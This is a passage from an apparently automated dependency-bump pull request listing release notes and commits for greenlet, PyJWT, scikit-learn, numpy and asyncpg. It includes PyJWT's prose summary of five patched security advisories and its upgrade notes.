href=\"https://redirect.github.com/MagicStack/asyncpg/issues/1281\"\u003e#1281\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/asyncpg/commit/4c60ae890d1f3800f889679657357f91a6923568\"\u003e\u003ccode\u003e4c60ae8\u003c/code\u003e\u003c/a\u003e Bump version to 0.31.0.dev0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/MagicStack/asyncpg/compare/v0.30.0...v0.31.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `greenlet` from 3.5.0 to 3.5.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-greenlet/greenlet/blob/master/CHANGES.rst\"\u003egreenlet's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e3.5.1 (2026-05-20)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdd preliminary support for Python 3.15b1. This has not been\nreviewed by CPython core developers, but all tests pass. Binary\nwheels of this version won't work on earlier Python 3.15 builds and\nmay not work on later 3.15 builds.\u003c/li\u003e\n\u003cli\u003eFix the discrepancy in the way the two \u003ccode\u003egetcurrent\u003c/code\u003e APIs behave\nduring greenlet teardown. One API (the C API used by, e.g.,  gevent) raised a\n\u003ccode\u003eRuntimeError\u003c/code\u003e; the other (the Python \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e API)\nreturned \u003ccode\u003eNone\u003c/code\u003e. This second way is incompatible with greenlet's type\nannotations, so \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e now raises a\n\u003ccode\u003eRuntimeError\u003c/code\u003e as well.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/b5e5fc43a51c27ecffa1b1c7107c91464a6b26e2\"\u003e\u003ccode\u003eb5e5fc4\u003c/code\u003e\u003c/a\u003e Preparing release 3.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/c8e177413d34bc36ed56d2c185c232ab0538be90\"\u003e\u003ccode\u003ec8e1774\u003c/code\u003e\u003c/a\u003e Tweak wording in CHANGES about greenlet.getcurrent.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/7fb10c570f37b3eb4c8909c6164fdfac3269ddb6\"\u003e\u003ccode\u003e7fb10c5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/510\"\u003e#510\u003c/a\u003e from python-greenlet/315\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/9718ce5a23ea3360232b78a806a837d6c3d6183d\"\u003e\u003ccode\u003e9718ce5\u003c/code\u003e\u003c/a\u003e Add Py 3.15; make both API versions of getcurrent() consistent in raising Run...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/276e08afc4ddba87e4366390e3eeaecd61ccb3b8\"\u003e\u003ccode\u003e276e08a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/509\"\u003e#509\u003c/a\u003e from python-greenlet/dependabot/github_actions/github...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/32b0ad69828eb69d879c70dbee948e685268901b\"\u003e\u003ccode\u003e32b0ad6\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish in the github-actions group\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/173b692dc84288ef41572612ac744754f98eaa90\"\u003e\u003ccode\u003e173b692\u003c/code\u003e\u003c/a\u003e Back to development: 3.5.1\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/python-greenlet/greenlet/compare/3.5.0...3.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `scikit-learn` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/scikit-learn/scikit-learn/releases\"\u003escikit-learn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eScikit-learn 1.9.0\u003c/h2\u003e\n\u003cp\u003eWe're happy to announce the 1.9.0 release.\u003c/p\u003e\n\u003cp\u003eYou can read the release highlights under \u003ca href=\"https://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_9_0.html\"\u003ehttps://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_9_0.html\u003c/a\u003e and the long version of the change log under \u003ca href=\"https://scikit-learn.org/stable/whats_new/v1.9.html\"\u003ehttps://scikit-learn.org/stable/whats_new/v1.9.html\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThis release adds \u003ca href=\"https://narwhals-dev.github.io/narwhals/\"\u003enarwhals\u003c/a\u003e as a new dependency that will help to improve dataframe interoperability across the project.\u003c/p\u003e\n\u003cp\u003eThis version supports Python versions 3.11 to 3.14.\u003c/p\u003e\n\u003cp\u003eYou can upgrade with pip as usual:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003epip install -U scikit-learn\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThe conda-forge builds can be installed using:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003econda install -c conda-forge scikit-learn\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/77def0ed6e3beab57244885d2a584470e96c103d\"\u003e\u003ccode\u003e77def0e\u003c/code\u003e\u003c/a\u003e trigger wheel builder [cd build]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/ee7c0b0e34ffe0f5eff8c7aeda49783f70bd9faa\"\u003e\u003ccode\u003eee7c0b0\u003c/code\u003e\u003c/a\u003e generate changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/3d7fb048fc5f05555a202d2b24307628841904b5\"\u003e\u003ccode\u003e3d7fb04\u003c/code\u003e\u003c/a\u003e bump version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/8954e7baf1f827320b17817f0ab76d025f5e6421\"\u003e\u003ccode\u003e8954e7b\u003c/code\u003e\u003c/a\u003e DOC Release highlights for 1.9 (\u003ca href=\"https://redirect.github.com/scikit-learn/scikit-learn/issues/34147\"\u003e#34147\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/73a3eab9d7bc58b695e4da8765044815b90b8dee\"\u003e\u003ccode\u003e73a3eab\u003c/code\u003e\u003c/a\u003e Fix: Array-API - avoid failing for numpy fit + predict with sparse or array-l...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/8839aaeb2fa2a4e3ad2f0a5a69b5f427cffe1dd1\"\u003e\u003ccode\u003e8839aae\u003c/code\u003e\u003c/a\u003e DOC Thread-safety requirement for open_listener message consumer callback (\u003ca href=\"https://redirect.github.com/scikit-learn/scikit-learn/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/4d2476a4e2acc9429b96d8ee80218a96d24c2bde\"\u003e\u003ccode\u003e4d2476a\u003c/code\u003e\u003c/a\u003e DOC Refactor array API docs page (\u003ca href=\"https://redirect.github.com/scikit-learn/scikit-learn/issues/34054\"\u003e#34054\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/f9f812fe6a4ea54c482da6b195773917b636365e\"\u003e\u003ccode\u003ef9f812f\u003c/code\u003e\u003c/a\u003e :lock: :robot: CI Update lock files for scipy-dev CI build(s) :lock: :robot: ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/d779dc335a31d74ef472003d9012066f07ee8834\"\u003e\u003ccode\u003ed779dc3\u003c/code\u003e\u003c/a\u003e :lock: :robot: CI Update lock files for free-threaded CI build(s) :lock: :rob...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/6a03cf0906987ce77b37e780ccdebbe3f85e9235\"\u003e\u003ccode\u003e6a03cf0\u003c/code\u003e\u003c/a\u003e :lock: :robot: CI Update lock files for array-api CI build(s) :lock: :robot: ...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/scikit-learn/scikit-learn/compare/1.8.0...1.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `numpy` from 2.4.5 to 2.4.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/numpy/numpy/releases\"\u003enumpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.4.6 (May 18, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.6 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.6 is a quick release that fixes a regression discovered in the 2.4.5\nrelease.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 4 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e!EarlMilktea\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eSebastian Berg\u003c/li\u003e\n\u003cli\u003eWarren Weckesser\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePull requests merged\u003c/h2\u003e\n\u003cp\u003eA total of 4 pull requests were merged for this release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31444\"\u003e#31444\u003c/a\u003e: MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31453\"\u003e#31453\u003c/a\u003e: BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31459\"\u003e#31459\u003c/a\u003e: BUG: 